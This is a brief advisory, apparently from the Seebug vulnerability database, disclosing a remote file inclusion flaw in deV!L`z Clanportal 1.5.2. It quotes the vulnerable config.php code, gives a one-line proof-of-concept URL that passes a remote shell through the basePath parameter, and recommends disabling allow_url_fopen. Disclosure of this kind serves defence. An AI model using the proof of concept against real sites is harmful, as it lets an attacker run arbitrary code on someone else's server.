[+] deV!L`z Clanportal 1.5.2 Remote File Include Vulnerability [+] Discovered By: cr4wl3r [+] Download: http://www.dzcp.de/downloads/?action=download&id=131 [x] Code in [dzcp1.5.2/inc/config.php] ## REQUIRES ## require_once($basePath."/inc/mysql.php"); <--- RFI function show($tpl, $array) { global $tmpdir; $template = "../inc/_templates_/".$tmpdir."/".$tpl; if($fp = @fopen($template.".".html, "r")) $tpl = @fread($fp, filesize($template.".".html)); $array['dir'] = '../inc/_templates_/'.$tmpdir; foreach($array as $value => $code) { $tpl = str_replace('['.$value.']', $code, $tpl); } return $tpl; } [+] PoC: [path]/inc/config.php?basePath=[Shell] [+] Solution: Change php.ini and set allow_url_fopen to Off
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
暂无评论